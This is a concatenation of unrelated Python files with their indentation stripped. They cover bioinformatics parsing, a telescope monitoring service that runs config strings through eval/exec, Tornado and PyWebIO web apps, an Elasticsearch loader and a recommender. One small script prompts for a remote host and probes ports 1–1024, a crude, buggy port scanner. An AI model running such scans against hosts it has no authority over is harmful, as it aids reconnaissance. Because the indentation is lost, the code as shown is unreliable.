FPKM = np.zeros(len(tran_ids))
CI95 = np.zeros(len(tran_ids)) + 1.0
if ["dice", "brie"].count(method) == 1:
data = np.genfromtxt(file_name, skip_header=1, dtype="str")
idxT = id_mapping(tran_ids, data[:,0])
frac = data[idxT, 5].astype(float)
FPKM = data[idxT, 4].astype(float)
elif method == "miso":
tran_miso = []
frac_miso = np.array([])
CI95_miso = np.array([])
data = np.genfromtxt(file_name, skip_header=1, dtype="str")
for gn in range(data.shape[0]):
_tran_ids = data[gn,4].split(",")
for tr in range(len(_tran_ids)):
#_tran_ids[tr] = ".".join(_tran_ids[tr].split(".")[:2])[1:]
_tran_ids[tr] = _tran_ids[tr].split("_")[0][1:-2]
_frac = np.array(data[gn,1].split(","),"float")
_CI95 = np.array(data[gn,3].split(","),"float")
_CI95 = _CI95 - np.array(data[gn,2].split(","),"float")
if len(_tran_ids) == 2:
_frac = np.append(_frac, 1-_frac[-1])
_CI95 = np.append(_CI95, _CI95[-1])
tran_miso += _tran_ids
frac_miso = np.append(frac_miso, _frac)
CI95_miso = np.append(CI95_miso, _CI95)
# FPKM_miso = [float(x.split(":")[1]) for x in data[gn, 6].split(",")]
tran_miso = np.array(tran_miso, dtype="str")
idxT = id_mapping(tran_ids, tran_miso)
for j in range(len(FPKM)):
if idxT[j] >= 0:
FPKM[j] = frac_miso[idxT[j]]
CI95[j] = CI95_miso[idxT[j]]
else:
FPKM[j] = 0.0
CI95[j] = 1.0
frac = get_fraction(gene_ids, FPKM, ignoreNan)
elif method == "kallisto":
data = np.genfromtxt(file_name, skip_header=1, dtype="str")
idxT = id_mapping(tran_ids, [x.split("|")[1] for x in data[:,0]])
FPKM = data[idxT, 4].astype(float)
frac = get_fraction(gene_ids, FPKM, ignoreNan)
elif method == "rsem":
data = np.genfromtxt(file_name, skip_header=1, dtype="str")
idxT = id_mapping(tran_ids, [x.split("|")[1] for x in data[:,0]])
FPKM = data[idxT, 6].astype(float)
frac = get_fraction(gene_ids, FPKM, ignoreNan)
elif method == "cufflinks":
data = np.genfromtxt(file_name, skip_header=1, dtype="str")
idxT = id_mapping(tran_ids, data[:,0])
for j in range(len(FPKM)):
if idxT[j] >= 0:
FPKM[j] = data[idxT[j], 9].astype(float)
else:
if ignoreNan == False:
FPKM[j] = 0.0
else:
FPKM[j] = None
frac = get_fraction(gene_ids, FPKM, ignoreNan)
elif method == "flux":
data = np.genfromtxt(file_name, skip_header=0, dtype="str")
idxT = id_mapping(tran_ids, data[:,1])
FPKM = data[idxT, 5].astype(float)
frac = get_fraction(gene_ids, FPKM, ignoreNan)
elif method == "spanki":
data = np.genfromtxt(file_name, skip_header=1, dtype="str")
idxT = id_mapping(tran_ids, data[:,1])
FPKM = data[idxT, 3].astype(float)
frac = get_fraction(gene_ids, FPKM, ignoreNan)
else:
print("Unsupported method: %")
frac[:], FPKM[:] = None, None
return frac, FPKM
|
import unittest
from tests.login_test import LoginTestCase
ltc1 = unittest.TestLoader().loadTestsFromTestCase(LoginTestCase)
sanityTestSuite = unittest.TestSuite([ltc1])
unittest.TextTestRunner(verbosity=2).run(sanityTestSuite)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
from functools import wraps
from sanic.request import Request
from web_backend.nvlserver.module.request_logger.service import create_request_log_element
def request_logger(func):
""" Login required decorator used in api views.
:param func:
:return:
"""
@wraps(func)
async def decorated_view(*args, **kwargs):
resp = await func(*args, **kwargs)
# LOG API ACCESS TO DATABASE
if isinstance(args[0], Request):
if isinstance(args[0].body, bytes):
rdata = args[0].body.decode('utf-8')
else:
rdata = args[0].body
if isinstance(args[0].body, bytes):
resp_data = resp.body.decode('utf-8')
else:
resp_data = resp.body
await create_request_log_element(args[0], args[0].url, rdata, resp_data)
return resp
return decorated_view
|
def inint():
return int(input())
def inlist():
return list(map(int,input().split()))
count=0
a1=0;b1=0;c=str();num=0
def work(i,m1,n1,carry=0,m='',n=''):
global count,a1,b1,num,c
#print('index-',i,';c-',c,carry,n,'m1-',m1,'n1-',n1)
if i == num+1 :
if m1==a1 and n1==b1:
if m not in sola or n not in solb:count+=1;sola.add(m);solb.add(n);print(m,n)
elif m1==b1 and n1==a1:
if n not in sola or m not in solb:count+=1;sola.add(n);solb.add(m);print(n,m)
#print('sol',m,n,count)
return
if (m1>a1 and m1>b1) or (n1>a1 and n1>b1):return
#print(i,c,c[i],m1,n1)
if carry==1:
if c[i]=='1':
#print(1,0,0);
work(i+1,m1,n1,0,m+'0',n+'0')
#print(1,1,1);
work(i+1,m1+1,n1+1,1,m+'1',n+'1')
else:
#print(1,0,1);
work(i+1,m1,n1+1,0,m+'0',n+'1')
#print(1,1,0);
work(i+1,m1+1,n1,0,m+'1',n+'0')
else:
if c[i]=='1':
#print(0,1,0);
work(i+1,m1+1,n1,0,m+'1',n+'0')
#print(0,0,1);
work(i+1,m1,n1+1,0,m+'0',n+'1')
else:
#print(0,0,0);
work(i+1,n1,m1,0,m+'0',n+'0')
#print(0,1,1);
work(i+1,n1+1,m1+1,1,m+'1',n+'1')
for i in range(inint()):
count=0;sola=set();solb=set()
a,b,cc=inlist()
c=bin(cc)[::-1]
a1=bin(a).count('1');b1=bin(b).count('1')
from math import log as ln
num=int(ln(cc,2))
work(0,0,0)
print(count)
|
# ------------------------------------------------------------------
# imports
# ------------------------------------------------------------------
from shared.utils import HMILog
from shared.utils import tel_ids, redis_port
import threading
import time
from collections import Counter
import redis
import json
import jsonAcs
# Import ACS
import ACS__POA
from ACS import CBDescIn
from Acspy.Clients.SimpleClient import PySimpleClient
from Acspy.Common.Callbacks import CBvoid
# from Acspy.Common.Callbacks import CBdouble
from TelescopeStruct import props, GLOBAL_FREQ, QUEUE_FREQ
desc = CBDescIn(5L, 0L, 0L)
# ------------------------------------------------------------------
# Threading and Callback classes
# ------------------------------------------------------------------
class PollingThread(threading.Thread):
"""
class that defines the thread used for polling
"""
def __init__(self, *args, **kwargs):
super(PollingThread, self).__init__(*args, **kwargs)
self._stop = threading.Event()
# methods used for stopping the thread
def stop(self):
self._stop.set()
class MonitorCB(ACS__POA.CBdouble):
"""
class that defines the callback for the acs components
"""
def __init__(self, key):
self.log = HMILog(title=__name__)
self.key = key
self.r = redis.StrictRedis(host='localhost', port=6379, db=0)
def done(self, completion, desc, a):
"""
this method is called when monitoring ends and it writes to redis
"""
# sets the values into redis; title 10
self.r.setex(self.key, 10, json.dumps({'status': 'done', 'value': completion}))
self.log.info([['g', (" - PropertyMonitorLocal.done.%s - ") % (self.key)],
['p', completion]])
def working(self, completion, desc, a):
"""
this method is called when monitoring and it writes to redis
"""
self.r.setex(self.key, 10, json.dumps({'status': 'working', 'value': completion}))
self.log.info([['g', (" - PropertyMonitorLocal.working.%s - ") % (self.key)],
['p', completion]])
# Prefix constants
# global monitoring component prefix
COMPONENT_PREFIX_GLOBAL = 'ACS:G'
# local monitoring component prefix
COMPONENT_PREFIX_LOCAL = 'ACS:L'
# name of the queue used for monitoring
QUEUE_NAME = 'ACS:MonitorQueue'
# name of the queue used for polling
POLLING_QUEUE = 'ACS:PollingQueue'
# name of the queue used for querying from db
MONGO_QUEUE = 'ACS:MongoQueue'
# prefix of the dicts used for comparing the values in the db
DICT_SET_NAME = 'ACS:DictSet'
# the monitoring dictionary that contains the references of all active monitors
MONITOR_DICT = 'ACS:Monitor:Dict'
# Create a client and the ArraySupervisor component
client = PySimpleClient()
supervisor = client.getComponent("ArraySupervisor")
# Local property monitor dict
local_queue = Counter()
# dict used for storing active polling threads
polling_threads = dict()
# dict for storing references to the components
dict_of_components = dict()
# get the components
TEST_JAVA_T1 = client.getComponent("TEST_JAVA_T1")
TEST_JAVA_T2 = client.getComponent("TEST_JAVA_T2")
# you can add more here
# add the components to the dict
dict_of_components[TEST_JAVA_T1.name] = TEST_JAVA_T1
dict_of_components[TEST_JAVA_T2.name] = TEST_JAVA_T2
# ------------------------------------------------------------------
# PropertyMonitor classes
# ------------------------------------------------------------------
class PropertyMonitorQueue:
def __init__(self, site_type):
self.log = HMILog(title=__name__)
self.log.info([['y', " - PropertyMonitor Queue - "], ['g', site_type]])
self.site_type = site_type
self.tel_ids = tel_ids[site_type]
self.r = redis.StrictRedis(host='localhost', port=redis_port[site_type], db=0)
# to be on a safe side, clean the counter
self.r.delete(DICT_SET_NAME)
t = threading.Thread(target=self.queue_parser_loop)
# set the thread to daemon for quicker termination
t.daemon = True
t.start()
return
def queue_parser_loop(self):
"""
this method calls the queue_parser method every second
"""
while True:
self.queue_parser()
time.sleep(QUEUE_FREQ / 10000000)
def queue_parser(self):
"""
This method gets the list from the monitoring queue in redis. The values
# get parsed and put into a counter dict.
:return: a counter dict of components subscriptions
"""
#####
# Monitoring queue
#####
for _ in self.r.lrange(QUEUE_NAME, 0, 1000):
# Pop the element from queue and parse it
pop = self.r.rpop(QUEUE_NAME)
# split the pop'ed string
pop_command = pop.split(':', 1)[0]
pop_tel = pop.split(':', 1)[1]
pop_tel = "Monitor:" + pop_tel
# Depending on the prefix increment or decrement the counter
if pop_command == 'UNSUB':
self.log.info([['g', " - PropertyMonitorQueue.queue_parser.UNSUB - "],
['p', pop_tel]])
# Check if key value is lower than 0
if local_queue[pop_tel] <= 0:
local_queue.pop(pop_tel, None)
else:
local_queue[pop_tel] -= 1
else:
self.log.info([['g', " - PropertyMonitorQueue.queue_parser.SUB - "],
['p', pop_tel]])
local_queue[pop_tel] += 1
print local_queue
#####
# Polling queue
#####
for _ in self.r.lrange(POLLING_QUEUE, 0, 1000):
# Pop the element from queue and parse it
pop = self.r.rpop(POLLING_QUEUE)
pop_command = pop.split(':', 1)[0]
pop_tel = pop.split(':', 1)[1]
pop_tel = "Polling:" + pop_tel
# Depending on the prefix increment or decrement the counter
if pop_command == 'UNSUB':
# Check if key value is lower than 0
if local_queue[pop_tel] <= 0:
local_queue.pop(pop_tel, None)
else:
local_queue[pop_tel] -= 1
else:
local_queue[pop_tel] += 1
print local_queue
#####
# Database queue
#####
for _ in self.r.lrange(MONGO_QUEUE, 0, 1000):
# Pop the element from queue and parse it
pop = self.r.rpop(MONGO_QUEUE)
pop_command = pop.split(':', 1)[0]
pop_tel = pop.split(':', 1)[1]
pop_tel = "Mongo:" + pop_tel
# Depending on the prefix increment or decrement the counter
if pop_command == 'UNSUB':
# Check if key value is lower than 0
if local_queue[pop_tel] <= 0:
local_queue.pop(pop_tel, None)
else:
local_queue[pop_tel] -= 1
else:
local_queue[pop_tel] += 1
print local_queue
class PropertyMonitorGlobal:
def __init__(self, site_type):
self.log = HMILog(title=__name__)
self.log.info([['y', " - PropertyMonitor Global - "], ['g', site_type]])
self.site_type = site_type
self.tel_ids = tel_ids[site_type]
self.r = redis.StrictRedis(host='localhost', port=redis_port[site_type], db=0)
t = threading.Thread(target=self.tel_global_loop)
# set the thread to daemon for quicker termination
t.daemon = True
t.start()
return
def tel_global_loop(self):
"""
this method calls monitor_component_status every second
"""
while True:
self.monitor_component_status()
time.sleep(GLOBAL_FREQ / 10000000)
def monitor_component_status(self):
"""
This method monitors the global properties of the components and
# writes the values into redis.
:return:
"""
# for each component in the dict
for x in dict_of_components.keys():
# Build the component property dict
comp_prop_dict = dict()
# get the config for the global component
glob = props.get(x)
# for each property in the global component
for xy in glob["props"]:
# eval the pollin command and save to dict
comp_prop_dict[xy[0]] = eval(glob["component_name"] + [xy[1]][0])
self.log.info([[
'g', (" - PropertyMonitorGlobal.monitor_component_status.%s.%s - ") %
(glob["component_name"], xy[0])
], ['p', eval(glob["component_name"] + [xy[1]][0])]])
# Create key for the component
rkey = COMPONENT_PREFIX_GLOBAL + ':%s' % x
# Save the dict into redis
self.r.set(rkey, json.dumps(comp_prop_dict))
self.r.set(COMPONENT_PREFIX_GLOBAL, dict_of_components)
class PropertyMonitorLocal:
def __init__(self, site_type):
self.log = HMILog(title=__name__)
self.log.info([['y', " - PropertyMonitor Local - "], ['g', site_type]])
self.site_type = site_type
self.tel_ids = tel_ids[site_type]
self.r = redis.StrictRedis(host='localhost', port=redis_port[site_type], db=0)
t = threading.Thread(target=self.tel_local_loop)
# set the thread to daemon for quicker termination
t.daemon = True
t.start()
return
def get_redis(self):
"""
:return: the instance of the redis client
"""
return self.r
def tel_local_loop(self):
"""
this method calls monitor_component_properties every second
"""
while True:
self.monitor_component_properties()
time.sleep(1)
# Polling generator
def sub_polling(self, component, params, key, command):
"""
this method returns the code for getting the value of a specific prop in polling mode
:param component: the component that has the prop
:param params: dict of additional parameters
:param key: the key used to build the redis key
:param command: command used for polling
:return: code for getting a prop value in polling mode
"""
# create the string containing the code
command_str = "%s%s" % (component, command)
print "started polling " + key + " with frequency:" + \
str(params["polling_interval"])
# save the return value
while local_queue.get("Polling:" + key) > 0:
# eval the string and save the value
value = eval(command_str)
print key + ": " + str(value)
# save the value into redis
# Build local component key
rkey_local = COMPONENT_PREFIX_LOCAL + ':Polling:%s' % key
set_name = DICT_SET_NAME + ':%s' % key
# check if the value in redis different
if self.r.sadd(set_name, value):
# recreate the set
self.r.delete(set_name)
self.r.sadd(set_name, value)
# Push to local component key; TTL 10sec
self.r.setex(rkey_local, 10, value)
else:
continue
# sleep for x seconds where x is specified in the config
time.sleep(int(params["polling_interval"] / 10000000))
# Monitor generator
def sub_monitoring(self, component, params, command):
"""
this method creates a string that contains monitor creation code
:param component: the name of the component we are monitoring on
:param params: dict of params (default monitoring rate etc.
:param command: the command to create the monitor
:return: monitor creation string
"""
# creates monitor for the specified component and prop
mon_create = "mon=%s%s.create_monitor(client.activateOffShoot(cb), desc)" % (
component, command
)
# set the monitoring interval
mon_timer_trigger = "mon.set_timer_trigger(%d)" % int(
params["timer_trigger_interval"]
)
# create the final string that will be exec'ed
mon_setup = mon_create + "\n" + mon_timer_trigger + "\n" + \
"mon.set_value_trigger(%i, %s)" % (
params["value_trigger_delta"], params["is_monitor_value"])
return mon_setup
def create_monitor(self, rkey_local, key):
"""
spawn a new monitor in a greenlet
:param rkey_local: the key used for redis
:param key: component name to get the properties from the config
"""
cb = MonitorCB(rkey_local)
# creates the monitor from the generated string
exec(
self.sub_monitoring(
props[key]['component_name'],
props[key]["Monitor"]["additional_parameters"],
props[key]["Monitor"]["monitoring_command"]
)
)
# adds the reference to the newly created monitor to monitors dict
encoded_mon = jsonAcs.encode(mon)
# add the newly created monitor reference to the hset in redis
self.r.hset(MONITOR_DICT, key, encoded_mon)
def monitor_component_properties(self):
"""
This method monitors the local properties of a component.
# Monitoring occurs only for the components that has subs
listening. Monitoring can be done on three different ways
# (BACI, Polling or get history from MongoDB)
"""
for key in local_queue.keys():
# parse to get the property name without the prefix
monitor_key = key.split(':', 1)[1]
if local_queue[key] == 0 and monitor_key in polling_threads.keys():
# get the thread of the property
t = polling_threads.pop(monitor_key, None)
# stop the thread
t.stop()
print key + " thread removed."
# check if the property has a monitor when the counter reaches 0
if local_queue[key] == 0 and self.r.hexists(MONITOR_DICT, monitor_key):
# get the monitor from redis hset
redis_monitor = self.r.hget(MONITOR_DICT, monitor_key)
m = jsonAcs.decode(redis_monitor)
# destroy the monitor
m.destroy()
print key + " monitor removed."
# remove the monitor key from the hset in redis
self.r.hdel(MONITOR_DICT, monitor_key)
if local_queue[key] > 0:
# split the key to check what kind of monitoring is needed
key_prefix = key.split(':', 1)[0]
key = key.split(':', 1)[1]
# dict used for saving data to redis
tel_prop_dict = dict()
# when there are 0 subscribers to a key check if monitor exists
if key_prefix == "Monitor":
tel_prop_dict[key] = ""
# Build local component key
rkey_local = COMPONENT_PREFIX_LOCAL + ':Monitor:%s' % key
set_name = DICT_SET_NAME + ':%s' % key
# check the redis hset if the monitor exists
if not self.r.hexists(MONITOR_DICT, monitor_key):
self.create_monitor(rkey_local, key)
print "Added monitor for property " + key + "."
# check if the value in redis different
if self.r.sadd(set_name, json.dumps(tel_prop_dict)):
# recreate the set
self.r.delete(set_name)
self.r.sadd(set_name, json.dumps(tel_prop_dict))
# Push to local component key; TTL 10sec
self.r.setex(rkey_local, 10, json.dumps(tel_prop_dict))
else:
continue
elif key_prefix == "Polling":
# if a thread for the current property doesn't exist, create it
if key not in polling_threads.keys():
# create a polling thread
t = PollingThread(
target=self.sub_polling,
args=(
props[key]["component_name"],
props[key]["Polling"]["additional_parameters"], key,
props[key]["Polling"]["polling_command"]
)
)
polling_threads[key] = t
t.start()
# todo: not implemented yet
elif key_prefix == "Mongo":
print "DB not supported yet"
else:
print "unsupported monitoring"
|
# coding: utf-8
import os
import base64
import uuid
import json
import tornado.auth
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado.options import define, options
from tornado.web import url
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
import models
define("port", default=8888, help="run on the given port", type=int)
define("debug", default=True, type=bool)
define("db_path", default='sqlite:///test.db', type=str)
class Application(tornado.web.Application):
def __init__(self):
handlers = [
url(r'/', IndexHandler, name='index'),
url(r'/thread/(\d+)', ThreadHandler, name='thread'),
]
settings = dict(
debug=options.debug,
static_path=os.path.join(os.path.dirname(__file__), 'static'),
template_path=os.path.join(os.path.dirname(__file__), 'templates'),
xsrf_cookies=True,
cookie_secret=base64.b64encode(
uuid.uuid4().bytes + uuid.uuid4().bytes),
)
tornado.web.Application.__init__(self, handlers, **settings)
engine = create_engine(
options.db_path, convert_unicode=True, echo=options.debug)
models.init_db(engine)
self.db = scoped_session(sessionmaker(bind=engine))
class BaseHandler(tornado.web.RequestHandler):
@property
def db(self):
return self.application.db
# Write your handlers here
class IndexHandler(BaseHandler):
def get(self):
if "X-Requested-With" in self.request.headers:
if self.request.headers['X-Requested-With'] == "XMLHttpRequest":
t = self.db.query(
models.Thread.id,
models.Thread.title,
models.Thread.author).all()
threads = [dict(zip(('id', 'title', 'author'), _)) for _ in t]
result = json.dumps(threads)
self.write(result)
else:
self.render('index.html')
def post(self):
try:
author = self.get_argument('author', None)
title = self.get_argument('title', None)
body = self.get_argument('body', None)
t = models.Thread(author=author, title=title, body=body)
self.db.add(t)
self.db.commit()
except Exception:
self.db.rollback()
finally:
self.db.close()
self.write('ok')
class ThreadHandler(BaseHandler):
def get(self, id):
if "X-Requested-With" in self.request.headers:
if self.request.headers['X-Requested-With'] == "XMLHttpRequest":
t = self.db.query(
models.Thread.id,
models.Thread.author,
models.Thread.title,
models.Thread.body,
).filter_by(id=id).first()
c = self.db.query(
models.Comment.author,
models.Comment.comment).filter_by(thread_id=id).all()
comments = [dict(zip(('author', 'comment'), _)) for _ in c]
thread = dict(zip(('id', 'author', 'title', 'body'), t))
thread.update({'comments': comments})
result = json.dumps(thread)
self.write(result)
else:
self.render('thread.html')
def post(self, id):
try:
author = self.get_argument('author', None)
comment = self.get_argument('comment', None)
thread_id = id
c = models.Comment(
author=author,
comment=comment,
thread_id=thread_id)
self.db.add(c)
self.db.commit()
except Exception as e:
print(e)
self.db.rollback()
finally:
self.db.close()
self.write('ok')
def main():
tornado.options.parse_command_line()
http_server = tornado.httpserver.HTTPServer(Application())
http_server.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
main()
|
"""
Usage:
1. put this file to the directory that you want to use in `path_deploy()`
2. change the app name if needed
3. run this file.
"""
import os
from os import path
from tornado import template
from pywebio.output import *
from pywebio.platform.path_deploy import filename_ok
from pywebio.session import *
#Change the name of the multipage app
app_name = 'A multipage app'
BASE_DIR = path.dirname(path.abspath(__file__))
TPL = """
<style>
body {
padding: 0 200px;
}
.sidebar {
padding-left: 20px;
position: fixed;
left: 0;
width: 250px;
top: 0;
bottom: 0;
background-color: #f2f2f2;
z-index: 999;
padding-bottom: 60px;
}
iframe {
display: none;
position: fixed;
width: calc(100% - 200px);
height: 100%;
left: 200px;
top: 0;
right: 0;
bottom: 0;
z-index: 10;
}
.sidebar > .tree{
height: 100%;
overflow-y: auto;
}
</style>
<div class="sidebar">
<h3>Navigator</h3>
<div class="tree">
<ul>
{% for name, url in apps %}
<li><a href="javascript:iframe_open('{{url}}')">{{name}}</a></li>
{% end %}
{% for name, url in dirs %}
<li><a href="javascript:dir_open('{{url}}')">{{name}}\</a></li>
{% end %}
</ul>
</div>
</div>
<iframe src="#" frameborder="0"></iframe>
<script>
$('.footer').remove();
function iframe_open(url) {
$('iframe').show().attr('src', url);
$('.alert-info').hide();
}
function dir_open(url) {
window.location.hash = '#' + url;
window.location.reload();
}
</script>
"""
def main():
target_path = eval_js("window.location.hash")[1:].lstrip('/') or ''
if '.' in target_path:
target_path = ''
p = path.join(BASE_DIR, target_path)
apps = []
dirs = []
try:
files = os.listdir(p)
except Exception:
put_error("URL error")
return
for f in files:
if not filename_ok(f):
continue
full_path = path.join(p, f)
if os.path.isfile(full_path):
if 'main()' not in open(full_path).read():
continue
if f.endswith('.py') and f != 'index.py':
apps.append((f[:-3], path.join(target_path, f[:-3])))
else:
dirs.append((f, path.join(target_path, f)))
if target_path:
dirs.append(['..', path.dirname(target_path)])
tpl = template.Template(TPL)
html = tpl.generate(apps=apps, dirs=dirs).decode('utf8')
put_html(html)
put_info("%s" %app_name)
if __name__ == '__main__':
from pywebio.platform.path_deploy import path_deploy
path_deploy(BASE_DIR, port=8089, debug=True, cdn=False)
|
import unittest
import os
from gmc.conf import settings
from gmc.core import handler
class TestSettings(unittest.TestCase):
def setUp(self):
handler.execute_from_command_line(['', 'setting.py'], quiet=True)
def test_settings_loader(self):
self.assertEqual(settings.DATASET_DIR, '/home/kapil')
|
#!/usr/bin/env python
import socket
import subprocess
import sys
# Ask for input
remoteServer = raw_input("Enter a remote host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)
remoteServerEx = socket.gethostbyname_ex(remoteServer)
remoteok = True
print "-" * 60
print "Please wait, scanning remote host", remoteServerIP, remoteServerEx
print "-" * 60
try:
for port in range(1, 1025):
while remoteok:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((remoteServerIP, port))
#if socket.has_ipv6 == 1:
if socket.has_ipv6 == True:
print "supported"
remoteok = False
if socket.has_ipv6 == False:
print "not"
remoteok = False
sock.close()
except KeyboardInterrupt:
print "CONTROL C"
sys.exit()
#subprocess.call('ping', shell=True
'echo hello'
|
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
import math as math
# Based on a matplotlib example at:
# https://matplotlib.org/mpl_toolkits/mplot3d/tutorial.html
def plotspiral(x_rot, y_rot, z_rot, scale):
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
theta = np.linspace(-4 * np.pi, 4 * np.pi, 100)
z = np.linspace(-2, 2, 100)
r = z**2 + 1
x = r * np.sin(theta)
y = r * np.cos(theta)
x, y, z = transform(x, y, z, x_rot, y_rot, z_rot, scale)
ax.plot(x, y, z, label='parametric curve')
ax.legend()
plt.show()
# Rotate around the x-axis, then the y-axis, then the z-axis, then scale
def transform(x, y, z, x_rot, y_rot, z_rot, scale):
# TODO
Matrix = np.array([x,y,z])
#Rx = [[1,0,0],[0,math.cos(x_rot),math.sin(x_rot)],[0,-math.sin(x_rot), math.cos(x_rot)]]#X Rotation Matrix
#Ry = [[math.cos(y_rot),0,-math.sin(y_rot)],[0,1,0],[math.sin(y_rot), 0,math.cos(y_rot)]]#Y Rotation Matrix
#Rz = [[math.cos(z_rot),math.sin(x_rot),0],[-math.sin(z_rot), math.cos(z_rot),0],[0,0,1]]#Z Rotation Matrix
Rx = [[1,0,0],
[0,math.cos(x_rot),-math.sin(x_rot)],
[0,math.sin(x_rot),math.cos(x_rot)]]
Ry = [[math.cos(y_rot),0,math.sin(y_rot)],
[0,1,0],
[-math.sin(y_rot),0,math.cos(y_rot)]]
Rz = [[math.cos(z_rot),-math.sin(z_rot),0],
[math.sin(z_rot),math.cos(z_rot),0],
[0, 0, 1]]
#MAT = np.matmul(Rx,Ry)
#MAT = np.matmul(MAT, Rz)
#Matrix = np.matmul(MAT, Matrix)
PT = np.matmul(np.matmul(Rz,np.matmul(Ry,Rx)),Matrix)*scale
return PT[0],PT[1],PT[2]
plotspiral(math.pi/2,math.pi/2,0,1)
|
from elasticsearch import Elasticsearch
es = Elasticsearch()
# Module to Include the Bulk Indexing Api
from elasticsearch import helpers
import csv
import time
host = "localhost"
port = 9200
index = "medical"
type = "hcpc"
filePath = "/home/matrix/ELK/data/hcpc.csv"
bulk_size = 500
actions = []
def readCsv(filePath):
fileObj = open(filePath)
reader = csv.DictReader(fileObj, delimiter=',')
return reader
def printFile(fileObj):
for line in fileObj:
print line
def composeDocuments(fileObj):
global actions
for line in fileObj:
action = {
"_index": index,
"_type": type,
"_source":
{'HCPC': line['HCPC'],
'SEQNUM': line['SEQNUM'],
'RECID': line['RECID'],
'LONG_DESCRIPTION': line['LONG_DESCRIPTION'],
'SHORT_DESCRIPTION': line['SHORT_DESCRIPTION']
}
}
actions.append(action)
if(len(actions) ==bulk_size):
bulkIndex(actions)
actions = []
bulkIndex(actions)
actions = []
def bulkIndex(action):
print "Processing"
print len(action)
helpers.bulk(es, action)
fileObj = readCsv(filePath)
# printFile(fileObj)
composeDocuments(fileObj)
start = time.time()
end = time.time()
print(end - start)
|
# Stephanie Gillow
# CS110
# I pledge my honor I have abided by the Stevens honor system.
import datetime
def checkDate(datestring):
try:
datetime.datetime.strptime(datestring, '%m/%d/%Y')
except ValueError:
raise ValueError("Invalid date, or incorrect format.")
inputdate = input("Enter the date in month/day/year format: ")
checkDate(inputdate)
print("Your date is valid.")
|
from base.recommender import Recommender
from tool import qmath
from structure.symmetricMatrix import SymmetricMatrix
from collections import defaultdict
class UserKNN(Recommender):
def __init__(self,conf,trainingSet=None,testSet=None,fold='[1]'):
super(UserKNN, self).__init__(conf,trainingSet,testSet,fold)
self.userSim = SymmetricMatrix(len(self.data.name2id['user']))
self.topUsers = {}
def readConfiguration(self):
super(UserKNN, self).readConfiguration()
self.neighbors = int(self.config['num.neighbors'])
def printAlgorConfig(self):
"show algorithm's configuration"
super(UserKNN, self).printAlgorConfig()
print ('Specified Arguments of',self.config['recommender']+':')
print ('num.neighbors:',self.config['num.neighbors'])
print ('='*80)
def initModel(self):
self.computeCorr()
def predict(self,u):
recommendations = []
for item in self.data.listened[self.recType]:
sum, denom = 0, 0
for simUser in self.topUsers[u]:
#if user n has rating on item i
if simUser[0] in self.data.listened[self.recType][item]:
similarity = simUser[1]
score = self.data.listened[self.recType][item][simUser[0]]
sum += similarity*score
denom += similarity
if sum!=0:
score = sum / float(denom)
recommendations.append((item,score))
recommendations = sorted(recommendations,key=lambda d:d[1],reverse=True)
recommendations = [item[0] for item in recommendations]
return recommendations
def computeCorr(self):
'compute correlation among users'
userListen = defaultdict(dict)
for user in self.data.userRecord:
for item in self.data.userRecord[user]:
if item[self.recType] in userListen[user]:
userListen[user][item[self.recType]] += 1
else:
userListen[user][item[self.recType]] = 0
print ('Computing user similarities...')
for ind,u1 in enumerate(userListen):
set1 = set(userListen[u1].keys())
for u2 in userListen:
if u1 != u2:
if self.userSim.contains(u1,u2):
continue
set2 = set(userListen[u2].keys())
sim = self.jaccard(set1,set2)
self.userSim.set(u1,u2,sim)
self.topUsers[u1] = sorted(self.userSim[u1].items(), key=lambda d: d[1], reverse=True)[:self.neighbors]
if ind%100==0:
print (ind,'/',len(userListen), 'finished.')
print ('The user correlation has been figured out.')
def jaccard(self,s1,s2):
return 2*len(s1.intersection(s2))/(len(s1.union(s2))+0.0)
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Continuing from tboolean-12
TODO: merge this with the much better plotting technique (deferred placement) of x018_torus_hyperboloid_plt.py
"""
import numpy as np, math
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle, Circle, Ellipse
import matplotlib.lines as mlines
from opticks.ana.torus_hyperboloid import Tor, Hyp
def make_rect( cxy , wh, **kwa ):
"""
:param cxy: center of rectangle
:param wh: width, height
"""
ll = ( cxy[0] - wh[0]/2., cxy[1] - wh[1]/2. )
return Rectangle( ll, wh[0], wh[1], **kwa )
if __name__ == '__main__':
R,r = 97.000,52.010
ch,cz,cn = 23.783,-23.773,-195.227
cyr = 75.951
r0 = R - r
rr0 = r0*r0
tor = Tor(R,r)
assert tor.rz(0) == R - r
assert tor.rz(r) == R
# in torus/hyp frame cylinder top and bottom at
ztop, zbot = ch - cz, -ch - cz # (47.556, -0.010000000000001563)
rtop, rbot = tor.rz(ztop), tor.rz(zbot)
zf = Hyp.ZF( rbot, ztop, rtop )
hyp = Hyp( rbot, zf )
#sz = R+1.5*r
sz = 400
exy,ez = 1.391,1.000
era = 179.00
bulb = Ellipse( xy=(0,0), width=2*exy*era, height=2*ez*era, fill=False )
rhs = Circle( (R,cz), radius=r, fill=False)
lhs = Circle( (-R,cz), radius=r, fill=False)
cy = make_rect( (0,0), (2*cyr,2*ch), fill=False )
byr = 45.010
byh = 57.510
cybase = make_rect( (0,-276.500), (2*byr, 2*byh), fill=False )
cur = 254.00
cuh = 92.000
cycut = make_rect( (0,cuh) , (2*cur, 2*cuh), fill=False )
plt.ion()
fig = plt.figure(figsize=(5,5))
plt.title("torus_hyperboloid_plt")
ax = fig.add_subplot(111)
ax.set_ylim([-sz,sz])
ax.set_xlim([-sz,sz])
ax.add_patch( bulb )
